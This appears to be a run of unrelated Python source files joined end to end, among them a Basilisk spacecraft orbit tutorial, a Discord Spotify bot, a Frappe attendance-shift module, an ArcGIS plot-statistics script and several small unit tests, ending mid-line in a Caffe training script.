assert config.user_config_file == str( Path("./tests/test_configs/test_partial_configuration/setup.cfg").resolve() ) def test_bad_configuration(self, monkeypatch): monkeypatch.setattr(Config, "cwd", Path("./tests/test_configs/test_bad_config_file/")) with pytest.warns(UserWarning): config = Config() assert config.forecast_type == "setup_file" assert config.user_agent == "setup_file" assert config.save_location == "./data" assert config.base_url == "https://api.met.no/weatherapi/locationforecast/2.0/" assert config.user_config_file == str( Path("./tests/test_configs/test_bad_config_file/setup.cfg").resolve() ) assert not hasattr(config, "not_a_real_configuration") # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from .version.version import name, version as __version__ # VITAL NOTE: ORDER MATTERS from .exceptions import DialectException, InvalidGraphError, UnweightedGraphError # load individual modules into the top level topologic namespace from .connected_components import number_connected_components, \ largest_connected_component, \ connected_components_generator from .partitioned_graph import PartitionedGraph from .graph_augmentation import rank_edges, diagonal_augmentation from . import similarity from . import io from . import projection from . import statistics from . import embedding from . import partition __all__ = [ 'connected_components_generator', 'DialectException', 'InvalidGraphError', 'largest_connected_component', 'number_connected_components', 'PartitionedGraph', 'diagonal_augmentation', 'UnweightedGraphError' ] start.py # -*- coding: utf-8 -*- """ start.py ~~~~~~~~~~~~~~~~~~~ :author: Finger :license: BSD, see LICENSE for more details. """ from apps.configs.config import CONFIG from apps.core.db.mongodb_config import MongoDBConfig from apps.core.utils.mongodb import update_collections from apps.core.db.mongodb import PyMongo print("* Check or update the database collection") mongodb_conf = MongoDBConfig() db_site = PyMongo() db_sys = PyMongo() db_user = PyMongo() db_init = 2 while db_init: db_site.init_app(config_prefix="MONGO_SITE", db_config=mongodb_conf.SITE_URI) db_sys.init_app(config_prefix="MONGO_SYS", db_config=mongodb_conf.SYS_URI) db_user.init_app(config_prefix="MONGO_USER", db_config=mongodb_conf.USER_URI) if db_init == 2: update_collections(db_sys=db_sys, db_site=db_site, db_user=db_user) db_init -= 1src/tests/scenarios/scenarioBasicOrbit.py ''' ''' ''' ISC License Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder Permission to use, copy, modify, and/or distribute this software for any purpose with or without fee is hereby granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. ''' # # Basilisk Scenario Script and Integrated Test # # Purpose: Integrated test of the spacecraftPlus() and gravity modules. Illustrates # a 3-DOV spacecraft on a range of orbit types. # Author: # Creation Date: Nov. 26, 2016 # import os import numpy as np import matplotlib.pyplot as plt # The path to the location of Basilisk # Used to get the location of supporting data. from Basilisk import __path__ bskPath = __path__[0] # import simulation related support from Basilisk.simulation import spacecraftPlus # general support file with common unit test functions # import general simulation support files from Basilisk.utilities import (SimulationBaseClass, macros, orbitalMotion, simIncludeGravBody, unitTestSupport) ## \defgroup Tutorials_1_0 ## @{ ## Demonstration of setup basic 3-DOF orbit simulation setup. # # Basic Orbit Setup and Translational Motion Simulation {#scenarioBasicOrbit} # ==== # # Scenario Description # ----- # This script sets up a 3-DOF spacecraft which is orbiting a planet. The purpose # is to illustrate how to create a spacecraft, attach a gravity model, and run # a basic Basilisk simulation. The scenarios can be run with the followings setups # parameters: # Setup | orbitCase | useSphericalHarmonics | planetCase # ----- | ------------------- | --------------------- | ----------- # 1 | LEO | False | Earth # 2 | GTO | False | Earth # 3 | GEO | False | Earth # 4 | LEO | True | Earth # 5 | LEO | False | Mars # # To run the default scenario 1 from the Basilisk/scenarios folder, call the python script through # # python scenarioBasicOrbit.py # # *However*, to play with any scenario scripts as tutorials, you should make a copy of them into a custom folder # outside of the Basilisk directory. # # To copy them, first find the location of the Basilisk installation. # After installing, you can find the installed location of Basilisk by opening a python interpreter and # running the commands: # #~~~~~~~~~~~~~~{.py} # import Basilisk # basiliskPath = Basilisk.__path__[0] # print basiliskPath #~~~~~~~~~~~~~~ # # Copy the folder `{basiliskPath}/tests` into a new folder in a different directory. # Now, when you want to use a tutorial, navigate inside that folder, and edit and execute the *copied* integrated tests. # # Qt Visualization Option # ----- # If you wish to transmit the simulation data to the Qt Visualization, then uncomment the following # line (line 360 in the script) from the python scenario script. If the Viz is running, and searching for a connection on # 127.0.0.1 (using Open Connection command from the File menu), the simulation is visualized in # realtime. To enable this, uncomment line 360 in this tutorial script. #~~~~~~~~~~~~~~{.py} # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only support 'earth', 'mars', or 'sun' #~~~~~~~~~~~~~~ # The current Qt based visualiztion is only able to show orbits about either Earth, Mars or the sun. # Be sure to match the celestial object name in the line above with the current simulation. # Further, note that by default the Viz is running in realtime mode with a 1x speed up factor. This Viz # speed up factor can be increased in the Qt GUI by calling up the # # View/Bottom Playback Controls # # The speed up factor is adusting in 2x steps up or down using the green arrows in this GUI. # This simulation is only updated at the rate of the simulation. Thus, for this orbit simulation with 10s # time steps the Viz will be choppy at 1x. Speeding up the Viz playback with the green arrows quickly illustrates # the orbital motion. # # # Simulation Scenario Setup Details # ----- # The simulation layout is shown in the following illustration. A single simulation process is created # which contains the spacecraft object. Gravity effectors are attached to the spacecraft dynamics to # simulate the gravitational accelerations. # ![Simulation Flow Diagram](Images/doc/test_scenarioBasicOrbit.svg "Illustration") # # When the simulation completes 2 plots are shown for each case. One plot always shows # the inertial position vector components, while the second plot either shows a planar # orbit view relative to the perfocal frame (no spherical harmonics), or the # semi-major axis time history plot (with spherical harmonics turned on). # # The dynamics simulation is setup using a SpacecraftPlus() module. #~~~~~~~~~~~~~~~~~{.py} # scObject = spacecraftPlus.SpacecraftPlus() # scObject.ModelTag = "spacecraftBody" #~~~~~~~~~~~~~~~~~ # Note that this module simulates both the translational and rotational motion of the spacecraft. # In this scenario only the translational (i.e. orbital) motion is tracked. This means the rotational motion # remains at a default inertial frame orientation in this scenario. There is no appreciable speed hit to # simulate both the orbital and rotational motion for a single rigid body. In the later scenarios # the rotational motion is engaged by specifying rotational initial conditions, as well as rotation # related effectors. In this simple scenario only translational motion is setup and tracked. # Further, the default spacecraft parameters, such as the unit mass and the principle inertia values are # just fine for this orbit simulation as they don't impact the orbital dynamics in this case. # This is true for all gravity force only orbital simulations. Later # tutorials, such as [scenarioAttitudeFeedback.py](@ref scenarioAttitudeFeedback), # illustrate how to over-ride default values with desired simulation values. # # Next, this module is attached to the simulation process #~~~~~~~~~~~~~~~~~{.py} # scSim.AddModelToTask(simTaskName, scObject) #~~~~~~~~~~~~~~~~~ # The first step to adding gravity objects is to create the gravity body factor class. Note that # this call will create an empty gravitational body list each time this script is called. Thus, there # is not need to clear any prior list of gravitational bodies. #~~~~~~~~~~~~~~~~~{.py} # gravFactory = simIncludeGravBody.gravBodyFactory() #~~~~~~~~~~~~~~~~~ # To attach an Earth gravity model to this spacecraft, the following macro is invoked: #~~~~~~~~~~~~~~~~~{.py} # planet = gravFactory.createEarth() # planet.isCentralBody = True # ensure this is the central gravitational body #~~~~~~~~~~~~~~~~~ # The gravFactor() class stores the Earth gravitational object within the class, but it also returns a # handler to this gravitational object as a convenience. The celestial object position and velocity # vectors are all defaulted to zero values. If non-zero values are required, this can be manually # overriden. If multiple bodies are simulated, then their positions can be # dynamically updated. See [scenarioOrbitMultiBody.py](@ref scenarioOrbitMultiBody) to learn how this is # done via a SPICE object. # # If extra customization is required, see the createEarth() macro to change additional values. # For example, the spherical harmonics are turned off by default. To engage them, the following code # is used #~~~~~~~~~~~~~~~~~{.py} # planet.useSphericalHarmParams = True # simIncludeGravBody.loadGravFromFile(Basilisk.__path__[0]+'/supportData/LocalGravData/GGM03S-J2-only.txt' # , planet.spherHarm # ,2 # ) #~~~~~~~~~~~~~~~~~ # The value 2 indidates that the first two harmonics, excluding the 0th order harmonic, # are included. This harmonics data file only includes a zeroth order and J2 term. # # Finally, the gravitational body must be connected to the spacecraft object. This is done with #~~~~~~~~~~~~~~~~~{.py} # scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) #~~~~~~~~~~~~~~~~~ # Here the complete list of gravitational bodies is automatically assigned to the spacecraft, regardless if # it is only one body like Earth or Mars, or a list of multiple bodies. # # Note that the default planets position and velocity vectors in the gravitational body are set to zero. If # alternate position or velocity vectors are requried, this can be done by creating the planet ephemerise message # that is connected to the gravity effector input message `bodyInMsgName`. # If time varying planet ephemeris messages are to be included use the Spice module. For non-zero messages # the planet's default ephemeris would be replaced with the desired custom values. How to use Spice to setup # planet ephemerise is shown in the tutorial # [scenarioOrbitMultiBody.py](@ref scenarioOrbitMultiBody). # # To set the spacecraft initial conditions, the following initial position and velocity variables are set: #~~~~~~~~~~~~~~~~~{.py} # scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_CN_N # scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_CN_N #~~~~~~~~~~~~~~~~~ # These vectors specify the inertial position and velocity vectors relative to the planet of the # spacecraft center of mass location. Note that there are 2 points that can be tracked. The user always # specifies the spacecraft center of mass location with the above code. If the simulation output should be # about another body fixed point B, this can be done as well. This is useful in particular with more challenging # dynamics where the center of mass moves relative to the body. The following vector would specify the location of # the spacecraft hub center of mass (Bc) relative to this body fixed point. # ~~~~~~~~~~~~~~~~{.py} # scObject.hub.r_BcB_B = [[0.0], [0.0], [1.0]] # ~~~~~~~~~~~~~~~~ # If this vector is not specified, as in this tutorial scenario, then it defaults to zero. If only a rigid hub # is modeled, the Bc (hub center of mass) is the same as C (spacecraft center of mass). If the spacecrat contains # state effectors such as hinged panels, fuel slosh, imbalanced reaction wheels, etc., then the points Bc and C would # not be the same. Thus, in this simple simulation the body fixed point B and spacecraft center of mass are # identical. # # Before the simulation is ready to run, it must be initialized. The following code uses a convenient macro routine # which initializes each BSK module (run self init, cross init and reset) and clears the BSK logging stack. #~~~~~~~~~~~~~~~~~{.py} # scSim.InitializeSimulationAndDiscover() #~~~~~~~~~~~~~~~~~ # If there are messages that are shared across multiple BSK threads, as shown in # [scenarioAttitudeFeedback2T.py](@ref scenarioAttitudeFeedback2T), then this routine also # auto-discovers these shared messages. # # Setup 1 # ----- # # Which scenario is run is controlled at the bottom of the file in the code # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # The first 2 arguments can be left as is. The last 2 arguments control the # simulation scenario flags to turn on or off certain simulation conditions. The default # scenario places the spacecraft about the Earth in a LEO orbit and without considering # gravitational spherical harmonics. The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO0Earth.svg "Orbit Illustration") # # Setup 2 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'GTO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates an elliptical Geosynchronous Transfer Orbit (GTO) with zero orbit # inclination. The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1GTO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2GTO0Earth.svg "Orbit Illustration") # # Setup 3 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'GEO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular Geosynchronous Orbit (GEO) with zero orbit # inclination. The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1GEO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2GEO0Earth.svg "Orbit Illustration") # # Setup 4 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO, # orbit Case # True, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular LEO with a non-zero orbit # inclination. In this case the Earth's spherical harmonics are turned on. The # resulting position coordinates and semi-major axis time histories are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO1Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO1Earth.svg "Orbit Illustration") # # Setup 5 # ------- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO', # orbit Case # True, # useSphericalHarmonics # 'Mars' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular Low Mars Orbit or LMO with a non-zero orbit # inclination. If you wish to visualize this simulation, be sure to change the celestial object name in #~~~~~~~~~~~~~~{.py} # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'mars') # # The Viz only support 'earth', 'mars', or 'sun' #~~~~~~~~~~~~~~ # from 'earth' to 'mars'. In this simulation setup the planet's spherical harmonics are turned on. The # resulting position coordinates and semi-major axis time histories are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO0Mars.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO0Mars.svg "Orbit Illustration") # ## @} def run(show_plots, orbitCase, useSphericalHarmonics, planetCase): '''Call this routine directly to run the tutorial scenario.''' # Create simulation variable names simTaskName = "simTask" simProcessName = "simProcess" # Create a sim module as an empty container scSim = SimulationBaseClass.SimBaseClass() scSim.TotalSim.terminateSimulation() # # create the simulation process # dynProcess = scSim.CreateNewProcess(simProcessName) # create the dynamics task and specify the integration update time simulationTimeStep = macros.sec2nano(10.) dynProcess.addTask(scSim.CreateNewTask(simTaskName, simulationTimeStep)) # if this scenario is to interface with the BSK Viz, uncomment the following line # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only support 'earth', 'mars', or 'sun' # # setup the simulation tasks/objects # # initialize spacecraftPlus object and set properties scObject = spacecraftPlus.SpacecraftPlus() scObject.ModelTag = "spacecraftBody" # add spacecraftPlus object to the simulation process scSim.AddModelToTask(simTaskName, scObject) # setup Gravity Body gravFactory = simIncludeGravBody.gravBodyFactory() if planetCase is 'Mars': planet = gravFactory.createMarsBarycenter() planet.isCentralBody = True # ensure this is the central gravitational body if useSphericalHarmonics: planet.useSphericalHarmParams = True simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM2BData.txt', planet.spherHarm, 100) else: # Earth planet = gravFactory.createEarth() planet.isCentralBody = True # ensure this is the central gravitational body if useSphericalHarmonics: planet.useSphericalHarmParams = True simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM03S-J2-only.txt', planet.spherHarm, 2) mu = planet.mu # attach gravity model to spaceCraftPlus scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) # # setup orbit and simulation time # # setup the orbit using classical orbit elements oe = orbitalMotion.ClassicElements() rLEO = 7000. * 1000 # meters rGEO = 42000. * 1000 # meters if orbitCase is 'GEO': oe.a = rGEO oe.e = 0.00001 oe.i = 0.0 * macros.D2R elif orbitCase is 'GTO': oe.a = (rLEO + rGEO) / 2.0 oe.e = 1.0 - rLEO / oe.a oe.i = 0.0 * macros.D2R else: # LEO case, default case 0 oe.a = rLEO oe.e = 0.0001 oe.i = 33.3 * macros.D2R oe.Omega = 48.2 * macros.D2R oe.omega = 347.8 * macros.D2R oe.f = 85.3 * macros.D2R rN, vN = orbitalMotion.elem2rv(mu, oe) oe = orbitalMotion.rv2elem(mu, rN, vN) # this stores consistent initial orbit elements # with circular or equatorial orbit, some angles are arbitrary # # initialize Spacecraft States with the initialization variables # scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_BN_N scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_BN_N # set the simulation time n = np.sqrt(mu / oe.a / oe.a / oe.a) P = 2. * np.pi / n if useSphericalHarmonics: simulationTime = macros.sec2nano(3. * P) else: simulationTime = macros.sec2nano(0.75 * P) # # Setup data logging before the simulation is initialized # if useSphericalHarmonics: numDataPoints = 400 else: numDataPoints = 100 samplingTime = simulationTime / (numDataPoints - 1) scSim.TotalSim.logThisMessage(scObject.scStateOutMsgName, samplingTime) # # initialize Simulation: This function clears the simulation log, and runs the self_init() # cross_init() and reset() routines on each module. # If the routine InitializeSimulationAndDiscover() is run instead of InitializeSimulation(), # then the all messages are auto-discovered that are shared across different BSK threads. # scSim.InitializeSimulationAndDiscover() # # configure a simulation stop time time and execute the simulation run # scSim.ConfigureStopTime(simulationTime) scSim.ExecuteSimulation() # # retrieve the logged data # posData = scSim.pullMessageLogData(scObject.scStateOutMsgName + '.r_BN_N', range(3)) velData = scSim.pullMessageLogData(scObject.scStateOutMsgName + '.v_BN_N', range(3)) np.set_printoptions(precision=16) # # plot the results # fileName = os.path.basename(os.path.splitext(__file__)[0]) # draw the inertial position vector components plt.close("all") # clears out plots from earlier test runs plt.figure(1) fig = plt.gcf() ax = fig.gca() ax.ticklabel_format(useOffset=False, style='plain') for idx in range(1, 4): plt.plot(posData[:, 0] * macros.NANO2SEC / P, posData[:, idx] / 1000., color=unitTestSupport.getLineColor(idx, 3), label='$r_{BN,' + str(idx) + '}$') plt.legend(loc='lower right') plt.xlabel('Time [orbits]') plt.ylabel('Inertial Position [km]') figureList = {} pltName = fileName + "1" + orbitCase + str(int(useSphericalHarmonics))+ planetCase figureList[pltName] = plt.figure(1) if useSphericalHarmonics is False: # draw orbit in perifocal frame b = oe.a * np.sqrt(1 - oe.e * oe.e) p = oe.a * (1 - oe.e * oe.e) plt.figure(2, figsize=np.array((1.0, b / oe.a)) * 4.75, dpi=100) plt.axis(np.array([-oe.rApoap, oe.rPeriap, -b, b]) / 1000 * 1.25) # draw the planet fig = plt.gcf() ax = fig.gca() if planetCase == 'Mars': planetColor = '#884400' else: planetColor = '#008800' planetRadius = planet.radEquator / 1000 ax.add_artist(plt.Circle((0, 0), planetRadius, color=planetColor)) # draw the actual orbit rData = [] fData = [] for idx in range(0, len(posData)): oeData = orbitalMotion.rv2elem(mu, posData[idx, 1:4], velData[idx, 1:4]) rData.append(oeData.rmag) fData.append(oeData.f + oeData.omega - oe.omega) plt.plot(rData * np.cos(fData) / 1000, rData * np.sin(fData) / 1000, color='#aa0000', linewidth=3.0 ) # draw the full osculating orbit from the initial conditions fData = np.linspace(0, 2 * np.pi, 100) rData = [] for idx in range(0, len(fData)): rData.append(p / (1 + oe.e * np.cos(fData[idx]))) plt.plot(rData * np.cos(fData) / 1000, rData * np.sin(fData) / 1000, '--', color='#555555' ) plt.xlabel('$i_e$ Cord. [km]') plt.ylabel('$i_p$ Cord. [km]') plt.grid() else: plt.figure(2) fig = plt.gcf() ax = fig.gca() ax.ticklabel_format(useOffset=False, style='plain') smaData = [] for idx in range(0, len(posData)): oeData = orbitalMotion.rv2elem(mu, posData[idx, 1:4], velData[idx, 1:4]) smaData.append(oeData.a / 1000.) plt.plot(posData[:, 0] * macros.NANO2SEC / P, smaData, color='#aa0000', ) plt.xlabel('Time [orbits]') plt.ylabel('SMA [km]') pltName = fileName + "2" + orbitCase + str(int(useSphericalHarmonics)) + planetCase figureList[pltName] = plt.figure(2) if show_plots: plt.show() # close the plots being saved off to avoid over-writing old and new figures plt.close("all") return posData, figureList # # This statement below ensures that the unit test scrip can be run as a # stand-along python script # if __name__ == "__main__": run( True, # show_plots 'LEO', # orbit Case (LEO, GTO, GEO) True, # useSphericalHarmonics 'Earth' # planetCase (Earth, Mars) ) bgildson/brote-seed # -*- coding: utf-8 -*- from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy() # registra models da aplicacao from . import auth from . import meta from . import pessoa from . import revoked_token from . import usuario Elthan/discord-spotify-bot #!/usr/bin/env python3.5 from discord.ext import commands from cogs.utils import ClearQueue from cogs import config from cogs import music from cogs import search import asyncio import discord import logging import spotify import threading description = '''A bot for playing music from Spotify.''' logging.basicConfig(level=logging.INFO) bot = commands.Bot(command_prefix=config.prefix, description=description) @bot.event async def on_ready(): print('Logged in as') print(bot.user.name) print(bot.user.id) print('------') # SETUP # logged_in_event = threading.Event() def connection_state_listener(session): if session.connection.state is spotify.ConnectionState.LOGGED_IN: logged_in_event.set() session = spotify.Session() loop = spotify.EventLoop(session) loop.start() session.on( spotify.SessionEvent.CONNECTION_STATE_UPDATED, connection_state_listener ) session.login(config.user, config.secret) logged_in_event.wait() print(session.user) session.preferred_bitrate(spotify.Bitrate.BITRATE_320k) playlist = ClearQueue() bot.add_cog(search.Search(bot, session, playlist)) bot.add_cog(music.Music(bot, session, playlist)) bot.run(config.token) scripts/portal/kine_goSub4.py # Created by MechAviv # Kinesis Introduction # Map ID :: 331003200 # Subway :: Subway Car #3 GIRL = 1531067 sm.removeNpc(GIRL) sm.warpInstanceIn(331003300, 0)vs_example.py ''' Comparison of Continuous No-Regret Algorithms @date: May 26, 2015 ''' # Set up infrastructure and basic problem parameters import matplotlib as mpl mpl.use('Agg') # this is needed when running on a linux server over terminal import multiprocessing as mp import numpy as np import datetime, os import pickle from ContNoRegret.Domains import nBox, UnionOfDisjointnBoxes, DifferenceOfnBoxes, unitbox, hollowbox, vboxes, vL from ContNoRegret.LossFunctions import QuadraticLossFunction, random_QuadraticLosses from ContNoRegret.NoRegretAlgos import ContNoRegretProblem from ContNoRegret.utils import CNR_worker, plot_results, save_results, circular_tour from ContNoRegret.animate import save_animations from ContNoRegret.Potentials import (ExponentialPotential, IdentityPotential, pNormPotential, ExpPPotential, pExpPotential, FractionalLinearPotential) # this is the location of the folder for the results results_path = '' desc = 'NIPS2_CNR_vs' tmpfolder = '/Volumes/tmp/' # if possible, choose this to be a RamDisk # some flags for keeping a record of the simulation parameters save_res = True show_plots = False save_anims = True show_anims = False T = 2500 # Time horizon M = 10.0 # Uniform bound on the function (in the dual norm) L = 5.0 # Uniform bound on the Lipschitz constant N = 2500 # Number of parallel algorithm instances Ngrid = 250000 # Number of gridpoints for the sampling step vs = [0.50]#, 0.50, 0.25, 0.10, 0.05] doms, paths = [], [] for v in vs: d,p = vL(v, Npath=T, epsilon=0.15) doms.append(d) paths.append(p) # before running the computation, read this file so we can later save a copy in the results folder with open(__file__, 'r') as f: thisfile = f.read() problems = [] # loop over the domains with different vs for dom,path in zip(doms, paths): lossfuncs, Mnew, lambdamax = random_QuadraticLosses(dom, path, L, M, pd=True) # create the problem problems.append(ContNoRegretProblem(dom, lossfuncs, L, Mnew, desc=desc)) # Select a couple of potentials for the Dual Averaging algorithm potentials = [pNormPotential(1.05), pNormPotential(1.75)] alpha, theta = potentials[0].alpha_opt(dom.n), potentials[0].theta_opt(dom, M) etas = theta*(1+np.arange(T))**(-alpha) # the following runs fine if the script is the __main__ method, # but crashes when running from ipython pool = mp.Pool(mp.cpu_count()-1) processes = [] for i,prob in enumerate(problems): for pot in potentials: processes.append(pool.apply_async(CNR_worker, (prob, N,'DA'), {'opt_rate':False, 'Ngrid':Ngrid, 'potential':pot, 'pid':len(processes), 'tmpfolder':tmpfolder, 'etas':etas, 'label':'v={0:.2f}, '.format(prob.domain.v)+pot.desc, 'animate':[]})) # wait for the processes to finish an collect the results (as file handlers) results = [process.get() for process in processes] # plot results and/or save a persistent copy (pickled) of the detailed results timenow = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')# create a time stamp for unambiguously naming the results folder results_directory = '{}{}/'.format(results_path, timenow) if save_res: os.makedirs(results_directory, exist_ok=True) # this could probably use a safer implementation plot_results(results, 100, results_directory, show_plots) if save_anims: save_animations(results, 10, results_directory, show_anims) save_results(results, results_directory) # store the previously read-in contents of this file in the results folder with open(results_directory+str(__file__), 'w') as f: f.write(thisfile) else: plot_results(results, offset=100) # -*- coding: utf-8 -*- # Copyright (c) 2019, MIS and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _ from frappe.model.document import Document class AttendanceShift(Document): @frappe.whitelist() def assign_attendance_shift( self, grade=None, department=None, designation=None, employee=None, from_date=None, ): employees = self.get_employees( grade=grade, department=department, designation=designation, name=employee ) # assign attendance shift if employees: if len(employees) > 20: frappe.enqueue( assign_attendance_shift_for_employee, timeout=600, employees=employees, attendance_shift=self, from_date=from_date, ) else: assign_attendance_shift_for_employee( employees, self, from_date=from_date ) else: frappe.msgprint(_("No Employee Found")) def get_employees(self, **kwargs): conditions, values = [], [] for field, value in kwargs.items(): if value: conditions.append("{0}=%s".format(field)) values.append(value) condition_str = " and " + " and ".join(conditions) if conditions else "" employees = frappe.db.sql_list( "select name from tabEmployee " "where status='Active'{condition}".format(condition=condition_str), tuple(values), ) return employees def assign_attendance_shift_for_employee(employees, attendance_shift, from_date=None): attendance_shift_assignments = [] count = 0 for employee in employees: count += 1 assignment = create_attendance_shift_assignment( employee, attendance_shift, from_date ) attendance_shift_assignments.append(assignment) frappe.publish_progress( count * 100 / len(employees), title=_("Assigning Attendance Shift") ) if attendance_shift_assignments: frappe.msgprint(_("Structures have been assigned successfully")) def create_attendance_shift_assignment(employee, attendance_shift, from_date): assignment = frappe.new_doc("Attendance Shift Assignment") assignment.employee = employee assignment.attendance_shift = attendance_shift.name assignment.from_date = from_date assignment.save(ignore_permissions=True) assignment.submit() return assignment.name codeRimoe/homework # -*- coding: utf-8 -*- # Name: t104.py [Point(shp) Statistics] # Description: This is a script to gather statistics of point files(shp). # A csv file will be returned. # Counting the Mean_DBH, Min_DBH, ax_DBH, Mean_H, Min_H, Max_H of # every plot. # # Author: , SYSU # E-mail: # License: http://www.apache.org/licenses/ # # Reference: # Arcgis Help import arcgisscripting inf = '../rsgis/data/data5/plot_data.shp' out = '../rsgis/process/t104/plot_data.csv' gp = arcgisscripting.create() cur = gp.SearchCursor(inf) row = cur.Next() with open(out, 'w') as f: f.write('Plot_ID,Mean_DBH,Min_DBH,Max_DBH,Mean_H,Min_H,Max_H') while row: curP = row.GetValue('PLOT') arrD = [0, 999, 0] arrH = [0, 999, 0] N = 0 try: while row.GetValue('PLOT') == curP: if row.GetValue('PT_TYPE') == 'Tree': DBH = row.GetValue('DBH') HEIGHT = row.GetValue('HEIGHT') N += 1 arrD[0] += DBH arrH[0] += HEIGHT if DBH < arrD[1]: arrD[1] = DBH if DBH > arrD[2]: arrD[2] = DBH if HEIGHT < arrH[1]: arrH[1] = HEIGHT if HEIGHT > arrH[2]: arrH[2] = HEIGHT row = cur.Next() if N: arrD[0] /= N arrH[0] /= N f.write('\n' + str(curP) + ',' + str(arrD[0]) + ',' + str(arrD[1]) + ',' + str(arrD[2]) + ',' + str(arrH[0]) + ',' + str(arrH[1]) + ',' + str(arrH[2])) except: pass raw_input('Press to exit...') FreekDS/git-ci-analyzertests/CIDetector/test_TravisDetector.py from analyzer.Repository.TestRepo import TestRepo from analyzer.CIDetector.TravisDetector import TravisDetector, TRAVIS_CI def test_execute_happyday(): repo = TestRepo('FreekDS/git-ci-analyzer') detector = TravisDetector() res = detector.execute(repo) assert res is not None assert res == TRAVIS_CI def test_execute_non_existing_repo(): repo = TestRepo('doesnt-exist/repository') detector = TravisDetector() res = detector.execute(repo) assert res != TRAVIS_CI assert res is None def test_execute_travis_inactive(): repo = TestRepo('FreekDS/MSI-Mystic-Light-Controller', repo_type='github') detector = TravisDetector() res = detector.execute(repo) assert res != TRAVIS_CI assert res is None scripts/solve.py from export_env_variables import * from defs import * from utils import * import utils # def mid_training_prediction_from_val_txt_with_deploy(caffe, deploy_net, transformer, imgs_file, data_dir, mean_binaryproto): # # net = deploy_net # # # ### 3. CPU classification # # # # * Now we're ready to perform classification. Even though we'll only classify one image, we'll set a batch size of 50 to demonstrate batching. # # # In[6]: # # # set the size of the input (we can skip this if we're happy # # with the default; we can also change it later, e.g., for different batch sizes) # # !!!!!!!!!!!!!!1 This only made it predict 32 time for the same image # # net.blobs['data'].reshape(32, # batch size # # 3, # 3-channel (BGR) images # # CLASSIFICATION_IMAGE_SIZE, CLASSIFICATION_IMAGE_SIZE) # image size is 227x227 # # correct = 0 # count = 1 # # in my case, I'm reading the images file names from val.txt. # with open(imgs_file, "r") as f: # val_images = f.readlines() # # print("Net blobs Data shape (transformed image should correspond in chan, height, width) ", net.blobs['data'].data.shape) # # for image_name_n_label in val_images: # if len(image_name_n_label.split(' ')) != 2: # continue # # # in val.txt every line contains - filename label # image_file, label = data_dir + "/" + image_name_n_label.split(' ')[0], int(image_name_n_label.split(' ')[1]) # # image = caffe.io.load_image(image_file) # # # # image shape is (3, 256, 256). we want it (3, 227, 227) for caffenet. # # asking about shape[0] and shape[1] because I can't know if the image is (chan, h, w) or (h, w, chan) # if image.shape[0] == TRAINING_IMAGE_SIZE or image.shape[1] == 